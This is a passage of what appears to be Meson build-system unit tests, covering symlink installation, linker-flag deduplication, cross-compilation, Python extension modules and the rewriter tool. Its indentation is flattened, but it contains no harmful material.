out = self._run(['otool', '-L', f])
# Ensure that the otool output does not contain self.installdir
self.assertNotRegex(out, self.installdir + '.*dylib ')
def install_subdir_invalid_symlinks(self, testdir, subdir_path):
'''
Test that installation of broken symlinks works fine.
https://github.com/mesonbuild/meson/issues/3914
'''
testdir = os.path.join(self.common_test_dir, testdir)
subdir = os.path.join(testdir, subdir_path)
with chdir(subdir):
# Can't distribute broken symlinks in the source tree because it breaks
# the creation of zipapps. Create it dynamically and run the test by
# hand.
src = '../../nonexistent.txt'
os.symlink(src, 'invalid-symlink.txt')
try:
self.init(testdir)
self.build()
self.install()
install_path = subdir_path.split(os.path.sep)[-1]
link = os.path.join(self.installdir, 'usr', 'share', install_path, 'invalid-symlink.txt')
self.assertTrue(os.path.islink(link), msg=link)
self.assertEqual(src, os.readlink(link))
self.assertFalse(os.path.isfile(link), msg=link)
finally:
os.remove(os.path.join(subdir, 'invalid-symlink.txt'))
def test_install_subdir_symlinks(self):
self.install_subdir_invalid_symlinks('62 install subdir', os.path.join('sub', 'sub1'))
def test_install_subdir_symlinks_with_default_umask(self):
self.install_subdir_invalid_symlinks('195 install_mode', 'sub2')
def test_install_subdir_symlinks_with_default_umask_and_mode(self):
self.install_subdir_invalid_symlinks('195 install_mode', 'sub1')
@skipIfNoPkgconfigDep('gmodule-2.0')
def test_ldflag_dedup(self):
testdir = os.path.join(self.unit_test_dir, '52 ldflagdedup')
if is_cygwin() or is_osx():
raise unittest.SkipTest('Not applicable on Cygwin or OSX.')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
max_count = 0
search_term = '-Wl,--export-dynamic'
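# The flag must survive on the link line, but deduplication must ensure
# it never appears more than once on any single line.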
with open(build_ninja, 'r', encoding='utf-8') as f:
for line in f:
max_count = max(max_count, line.count(search_term))
self.assertEqual(max_count, 1, 'Export dynamic incorrectly deduplicated.')
def test_compiler_libs_static_dedup(self):
testdir = os.path.join(self.unit_test_dir, '56 dedup compiler libs')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
lines = f.readlines()
for lib in ('-ldl', '-lm', '-lc', '-lrt'):
for line in lines:
if lib not in line:
continue
# Assert that the library flag appears exactly once on this line.
self.assertEqual(len(line.split(lib)), 2, msg=(lib, line))
@skipIfNoPkgconfig
def test_noncross_options(self):
# C_std defined in project options must be in effect also when native compiling.
testdir = os.path.join(self.unit_test_dir, '51 noncross options')
self.init(testdir, extra_args=['-Dpkg_config_path=' + testdir])
compdb = self.get_compdb()
self.assertEqual(len(compdb), 2)
self.assertRegex(compdb[0]['command'], '-std=c99')
self.assertRegex(compdb[1]['command'], '-std=c99')
self.build()
def test_identity_cross(self):
testdir = os.path.join(self.unit_test_dir, '61 identity cross')
nativefile = tempfile.NamedTemporaryFile(mode='w')
nativefile.write('''[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'build_wrapper.py')))
nativefile.flush()
self.meson_native_file = nativefile.name
crossfile = tempfile.NamedTemporaryFile(mode='w')
crossfile.write('''[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'host_wrapper.py')))
crossfile.flush()
self.meson_cross_file = crossfile.name
# TODO should someday be explicit about build platform only here
self.init(testdir)
def test_identity_cross_env(self):
testdir = os.path.join(self.unit_test_dir, '61 identity cross')
env = {
'CC_FOR_BUILD': '"' + os.path.join(testdir, 'build_wrapper.py') + '"',
}
crossfile = tempfile.NamedTemporaryFile(mode='w')
crossfile.write('''[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'host_wrapper.py')))
crossfile.flush()
self.meson_cross_file = crossfile.name
# TODO should someday be explicit about build platform only here
self.init(testdir, override_envvars=env)
@skipIfNoPkgconfig
def test_static_link(self):
if is_cygwin():
raise unittest.SkipTest("Cygwin doesn't support LD_LIBRARY_PATH.")
# Build some libraries and install them
testdir = os.path.join(self.unit_test_dir, '68 static link/lib')
libdir = os.path.join(self.installdir, self.libdir)
oldprefix = self.prefix
self.prefix = self.installdir
self.init(testdir)
self.install(use_destdir=False)
# Test that the installed libraries work
self.new_builddir()
self.prefix = oldprefix
meson_args = ['-Dc_link_args=-L{}'.format(libdir),
'--fatal-meson-warnings']
testdir = os.path.join(self.unit_test_dir, '68 static link')
env = {'PKG_CONFIG_LIBDIR': os.path.join(libdir, 'pkgconfig')}
self.init(testdir, extra_args=meson_args, override_envvars=env)
self.build()
self.run_tests()
def _check_ld(self, check: str, name: str, lang: str, expected: str) -> None:
if is_sunos():
raise unittest.SkipTest('Solaris currently cannot override the linker.')
if not shutil.which(check):
raise unittest.SkipTest('Could not find {}.'.format(check))
envvars = [mesonbuild.envconfig.BinaryTable.evarMap['{}_ld'.format(lang)]]
# Also test a deprecated variable if there is one.
if envvars[0] in mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP:
envvars.append(
mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP[envvars[0]])
for envvar in envvars:
with mock.patch.dict(os.environ, {envvar: name}):
env = get_fake_env()
comp = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
if lang != 'rust' and comp.use_linker_args('bfd') == []:
raise unittest.SkipTest(
'Compiler {} does not support using alternative linkers'.format(comp.id))
self.assertEqual(comp.linker.id, expected)
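# For context: the variables looked up above are names like CC_LD or CXX_LD,
# so a run can be reproduced by hand with e.g. (assumed shell usage):
#   CC_LD=gold meson setup builddir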
def test_ld_environment_variable_bfd(self):
self._check_ld('ld.bfd', 'bfd', 'c', 'ld.bfd')
def test_ld_environment_variable_gold(self):
self._check_ld('ld.gold', 'gold', 'c', 'ld.gold')
def test_ld_environment_variable_lld(self):
self._check_ld('ld.lld', 'lld', 'c', 'ld.lld')
@skip_if_not_language('rust')
def test_ld_environment_variable_rust(self):
self._check_ld('ld.gold', 'gold', 'rust', 'ld.gold')
def test_ld_environment_variable_cpp(self):
self._check_ld('ld.gold', 'gold', 'cpp', 'ld.gold')
@skip_if_not_language('objc')
def test_ld_environment_variable_objc(self):
self._check_ld('ld.gold', 'gold', 'objc', 'ld.gold')
@skip_if_not_language('objcpp')
def test_ld_environment_variable_objcpp(self):
self._check_ld('ld.gold', 'gold', 'objcpp', 'ld.gold')
@skip_if_not_language('fortran')
def test_ld_environment_variable_fortran(self):
self._check_ld('ld.gold', 'gold', 'fortran', 'ld.gold')
@skip_if_not_language('d')
def test_ld_environment_variable_d(self):
# At least for me, ldc defaults to gold, and gdc defaults to bfd, so
# let's pick lld, which isn't the default for either (currently)
self._check_ld('ld.lld', 'lld', 'd', 'ld.lld')
def compute_sha256(self, filename):
with open(filename, 'rb') as f:
return hashlib.sha256(f.read()).hexdigest()
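# Reading the whole file at once is fine for these small test tarballs; as a
# sketch, a chunked read would avoid holding a large file in memory:
#   h = hashlib.sha256()
#   for chunk in iter(lambda: f.read(8192), b''):
#       h.update(chunk)
#   digest = h.hexdigest()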
def test_wrap_with_file_url(self):
testdir = os.path.join(self.unit_test_dir, '73 wrap file url')
source_filename = os.path.join(testdir, 'subprojects', 'foo.tar.xz')
patch_filename = os.path.join(testdir, 'subprojects', 'foo-patch.tar.xz')
wrap_filename = os.path.join(testdir, 'subprojects', 'foo.wrap')
source_hash = self.compute_sha256(source_filename)
patch_hash = self.compute_sha256(patch_filename)
wrap = textwrap.dedent("""\
[wrap-file]
directory = foo
source_url = http://server.invalid/foo
source_fallback_url = file://{}
source_filename = foo.tar.xz
source_hash = {}
patch_url = http://server.invalid/foo
patch_fallback_url = file://{}
patch_filename = foo-patch.tar.xz
patch_hash = {}
""".format(source_filename, source_hash, patch_filename, patch_hash))
with open(wrap_filename, 'w') as f:
f.write(wrap)
self.init(testdir)
self.build()
self.run_tests()
windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'packagecache'))
windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'foo'))
os.unlink(wrap_filename)
def should_run_cross_arm_tests():
return shutil.which('arm-linux-gnueabihf-gcc') and not platform.machine().lower().startswith('arm')
@unittest.skipUnless(not is_windows() and should_run_cross_arm_tests(), "requires ability to cross compile to ARM")
class LinuxCrossArmTests(BasePlatformTests):
'''
Tests that cross-compilation to Linux/ARM works
'''
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
self.meson_cross_file = os.path.join(src_root, 'cross', 'ubuntu-armhf.txt')
def test_cflags_cross_environment_pollution(self):
'''
Test that the CFLAGS environment variable does not pollute the cross
environment. This can't be an ordinary test case because we need to
inspect the compiler database.
'''
testdir = os.path.join(self.common_test_dir, '3 static')
self.init(testdir, override_envvars={'CFLAGS': '-DBUILD_ENVIRONMENT_ONLY'})
compdb = self.get_compdb()
self.assertNotIn('-DBUILD_ENVIRONMENT_ONLY', compdb[0]['command'])
def test_cross_file_overrides_always_args(self):
'''
Test that $lang_args in cross files always override get_always_args().
Needed for overriding the default -D_FILE_OFFSET_BITS=64 on some
architectures such as some Android versions and Raspbian.
https://github.com/mesonbuild/meson/issues/3049
https://github.com/mesonbuild/meson/issues/3089
'''
testdir = os.path.join(self.unit_test_dir, '33 cross file overrides always args')
self.meson_cross_file = os.path.join(testdir, 'ubuntu-armhf-overrides.txt')
self.init(testdir)
compdb = self.get_compdb()
self.assertRegex(compdb[0]['command'], '-D_FILE_OFFSET_BITS=64.*-U_FILE_OFFSET_BITS')
self.build()
def test_cross_libdir(self):
# When cross compiling "libdir" should default to "lib"
# rather than "lib/x86_64-linux-gnu" or something like that.
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
for i in self.introspect('--buildoptions'):
if i['name'] == 'libdir':
self.assertEqual(i['value'], 'lib')
return
self.assertTrue(False, 'Option libdir not in introspect data.')
def test_cross_libdir_subproject(self):
# Guard against a regression where calling "subproject"
# would reset the value of libdir to its default value.
testdir = os.path.join(self.unit_test_dir, '75 subdir libdir')
self.init(testdir, extra_args=['--libdir=fuf'])
for i in self.introspect('--buildoptions'):
if i['name'] == 'libdir':
self.assertEqual(i['value'], 'fuf')
return
self.assertTrue(False, 'Libdir specified on command line gets reset.')
def test_std_remains(self):
# c_std defined in the project options must also be in effect when cross compiling.
testdir = os.path.join(self.unit_test_dir, '51 noncross options')
self.init(testdir)
compdb = self.get_compdb()
self.assertRegex(compdb[0]['command'], '-std=c99')
self.build()
@skipIfNoPkgconfig
def test_pkg_config_option(self):
if not shutil.which('arm-linux-gnueabihf-pkg-config'):
raise unittest.SkipTest('Cross-pkgconfig not found.')
testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
self.init(testdir, extra_args=[
'-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
'-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
])
def should_run_cross_mingw_tests():
return shutil.which('x86_64-w64-mingw32-gcc') and not (is_windows() or is_cygwin())
@unittest.skipUnless(not is_windows() and should_run_cross_mingw_tests(), "requires ability to cross compile with MinGW")
class LinuxCrossMingwTests(BasePlatformTests):
'''
Tests that cross-compilation to Windows/MinGW works
'''
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
self.meson_cross_file = os.path.join(src_root, 'cross', 'linux-mingw-w64-64bit.txt')
def test_exe_wrapper_behaviour(self):
'''
Test that an exe wrapper that isn't found doesn't cause compiler sanity
checks and compiler checks to fail, but causes configure to fail if it
requires running a cross-built executable (custom_target or run_target)
and causes the tests to be skipped if they are run.
'''
testdir = os.path.join(self.unit_test_dir, '36 exe_wrapper behaviour')
# Configures, builds, and tests fine by default
self.init(testdir)
self.build()
self.run_tests()
self.wipe()
os.mkdir(self.builddir)
# Change cross file to use a non-existing exe_wrapper and it should fail
self.meson_cross_file = os.path.join(testdir, 'broken-cross.txt')
# Force tracebacks so we can detect them properly
env = {'MESON_FORCE_BACKTRACE': '1'}
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*target.*use-exe-wrapper'):
# Must run in-process or we'll get a generic CalledProcessError
self.init(testdir, extra_args='-Drun-target=false',
inprocess=True,
override_envvars=env)
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*run target.*run-prog'):
# Must run in-process or we'll get a generic CalledProcessError
self.init(testdir, extra_args='-Dcustom-target=false',
inprocess=True,
override_envvars=env)
self.init(testdir, extra_args=['-Dcustom-target=false', '-Drun-target=false'],
override_envvars=env)
self.build()
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*PATH'):
# Must run in-process or we'll get a generic CalledProcessError
self.run_tests(inprocess=True, override_envvars=env)
@skipIfNoPkgconfig
def test_cross_pkg_config_option(self):
testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
self.init(testdir, extra_args=[
'-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
'-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
])
class PythonTests(BasePlatformTests):
'''
Tests that verify compilation of python extension modules
'''
def test_versions(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Skipping python tests with {} backend'.format(self.backend.name))
testdir = os.path.join(self.src_root, 'test cases', 'unit', '39 python extmodule')
# No python version specified, this will use meson's python
self.init(testdir)
self.build()
self.run_tests()
self.wipe()
# When specifying a known name (python2 / python3), the module
# will also try 'python' as a fallback and use it if the major
# version matches
try:
self.init(testdir, extra_args=['-Dpython=python2'])
self.build()
self.run_tests()
except unittest.SkipTest:
# python2 is not necessarily installed on the test machine,
# if it is not, or the python headers can't be found, the test
# will raise MESON_SKIP_TEST, we could check beforehand what version
# of python is available, but it's a bit of a chicken and egg situation,
# as that is the job of the module, so we just ask for forgiveness rather
# than permission.
pass
self.wipe()
for py in ('pypy', 'pypy3'):
try:
self.init(testdir, extra_args=['-Dpython=%s' % py])
except unittest.SkipTest:
# Same as above, pypy2 and pypy3 are not expected to be present
# on the test system, the test project only raises in these cases
continue
# We have a pypy, this is expected to work
self.build()
self.run_tests()
self.wipe()
# The test is configured to error out with MESON_SKIP_TEST
# in case it could not find python
with self.assertRaises(unittest.SkipTest):
self.init(testdir, extra_args=['-Dpython=not-python'])
self.wipe()
# While dir is an external command on both Windows and Linux,
# it certainly isn't python
with self.assertRaises(unittest.SkipTest):
self.init(testdir, extra_args=['-Dpython=dir'])
self.wipe()
class RewriterTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.maxDiff = None
def prime(self, dirname):
copy_tree(os.path.join(self.rewrite_test_dir, dirname), self.builddir)
def rewrite_raw(self, directory, args):
if isinstance(args, str):
args = [args]
command = self.rewrite_command + ['--verbose', '--skip', '--sourcedir', directory] + args
p = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
universal_newlines=True, timeout=60)
print('STDOUT:')
print(p.stdout)
print('STDERR:')
print(p.stderr)
if p.returncode != 0:
if 'MESON_SKIP_TEST' in p.stdout:
raise unittest.SkipTest('Project requested skipping.')
raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
if not p.stderr:
return {}
return json.loads(p.stderr)
def rewrite(self, directory, args):
if isinstance(args, str):
args = [args]
return self.rewrite_raw(directory, ['command'] + args)
def test_target_source_list(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_add_sources(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['a5.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['a5.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['a3.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp', 'a4.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
}
}
self.assertDictEqual(out, expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, expected)
def test_target_add_sources_abs(self):
self.prime('1 basic')
abs_src = [os.path.join(self.builddir, x) for x in ['a1.cpp', 'a2.cpp', 'a6.cpp']]
add = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "src_add", "sources": abs_src}])
inf = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "info"}])
self.rewrite(self.builddir, add)
out = self.rewrite(self.builddir, inf)
expected = {'target': {'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']}}}
self.assertDictEqual(out, expected)
def test_target_remove_sources(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'rmSrc.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileC.cpp', 'main.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp']},
}
}
self.assertDictEqual(out, expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, expected)
def test_target_subdir(self):
self.prime('2 subdirs')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
expected = {'name': 'something', 'sources': ['first.c', 'second.c', 'third.c']}
self.assertDictEqual(list(out['target'].values())[0], expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(list(out['target'].values())[0], expected)
def test_target_remove(self):
self.prime('1 basic')
self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_add(self):
self.prime('1 basic')
self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog10@sha': {'name': 'trivialprog10', 'sources': ['new1.cpp', 'new2.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_remove_subdir(self):
self.prime('2 subdirs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, {})
def test_target_add_subdir(self):
self.prime('2 subdirs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {'name': 'something', 'sources': ['first.c', 'second.c']}
self.assertDictEqual(out['target']['94b671c@@something@exe'], expected)
def test_target_source_sorting(self):
self.prime('5 sorting')
add_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'src_add', 'sources': ['a666.c']}])
inf_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'info'}])
out = self.rewrite(self.builddir, add_json)
out = self.rewrite(self.builddir, inf_json)
expected = {
'target': {
'exe1@exe': {
'name': 'exe1',
'sources': [
'aaa/a/a1.c',
'aaa/b/b1.c',
'aaa/b/b2.c',
'aaa/f1.c',
'aaa/f2.c',
'aaa/f3.c',
'bbb/a/b1.c',
'bbb/b/b2.c',
'bbb/c1/b5.c',
'bbb/c2/b7.c',
'bbb/c10/b6.c',
'bbb/a4.c',
'bbb/b3.c',
'bbb/b4.c',
'bbb/b5.c',
'a1.c',
'a2.c',
'a3.c',
'a10.c',
'a20.c',
'a30.c',
'a100.c',
'a101.c',
'a110.c',
'a210.c',
'a666.c',
'b1.c',
'c2.c'
]
}
}
}
self.assertDictEqual(out, expected)
def test_target_same_name_skip(self):
self.prime('4 same name targets')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {'name': 'myExe', 'sources': ['main.cpp']}
self.assertEqual(len(out['target']), 2)
for val in out['target'].values():
self.assertDictEqual(expected, val)
def test_kwargs_info(self):
self.prime('3 kwargs')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1'},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_set(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'set.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.2', 'meson_version': '0.50.0', 'license': ['GPL', 'MIT']},
'target#tgt1': {'build_by_default': False, 'build_rpath': '/usr/local', 'dependencies': 'dep1'},
'dependency#dep1': {'required': True, 'method': 'cmake'}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_add(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'add.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'license': ['GPL', 'MIT', 'BSD']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_remove(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'remove.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'license': 'GPL'},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_remove_regex(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'remove_regex.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=true']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_delete(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'delete.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {},
'target#tgt1': {},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_default_options_set(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_set.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=True', 'cpp_std=c++11']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_default_options_delete(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_delete.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['cpp_std=c++14', 'debug=true']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
class NativeFileTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.testcase = os.path.join(self.unit_test_dir, '47 native file binary')
self.current_config = 0
self.current_wrapper = 0
def helper_create_native_file(self, values):
"""Create a config file as a temporary file.
values should be a nested dictionary structure of {section: {key:
value}}
"""
filename = os.path.join(self.builddir, 'generated{}.config'.format(self.current_config))
self.current_config += 1
with open(filename, 'wt') as f:
for section, entries in values.items():
f.write('[{}]\n'.format(section))
for k, v in entries.items():
f.write("{}='{}'\n".format(k, v))
return filename
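# e.g. helper_create_native_file({'binaries': {'bash': '/usr/bin/bash'}})
# produces a file containing:
#   [binaries]
#   bash='/usr/bin/bash'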
def helper_create_binary_wrapper(self, binary, dir_=None, extra_args=None, **kwargs):
"""Creates a wrapper around a binary that overrides specific values."""
filename = os.path.join(dir_ or self.builddir, 'binary_wrapper{}.py'.format(self.current_wrapper))
extra_args = extra_args or {}
self.current_wrapper += 1
if is_haiku():
shebang = '#!/bin/env python3'
else:
shebang = '#!/usr/bin/env python3'
with open(filename, 'wt') as f:
f.write(textwrap.dedent('''\
{}
import argparse
import subprocess
import sys
def main():
parser = argparse.ArgumentParser()
'''.format(shebang)))
for name in chain(extra_args, kwargs):
f.write(' parser.add_argument("-{0}", "--{0}", action="store_true")\n'.format(name))
f.write(' args, extra_args = parser.parse_known_args()\n')
for name, value in chain(extra_args.items(), kwargs.items()):
f.write(' if args.{}:\n'.format(name))
f.write(' print("{}", file=sys.{})\n'.format(value, kwargs.get('outfile', 'stdout')))
f.write(' sys.exit(0)\n')
f.write(textwrap.dedent('''
ret = subprocess.run(
["{}"] + extra_args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
print(ret.stdout.decode('utf-8'))
print(ret.stderr.decode('utf-8'), file=sys.stderr)
sys.exit(ret.returncode)
if __name__ == '__main__':
main()
'''.format(binary)))
if not is_windows():
os.chmod(filename, 0o755)
return filename
# On Windows we need yet another level of indirection, as cmd cannot
# invoke python files itself, so instead we generate a .bat file, which
# invokes our python wrapper
batfile = os.path.join(self.builddir, 'binary_wrapper{}.bat'.format(self.current_wrapper))
with open(batfile, 'wt') as f:
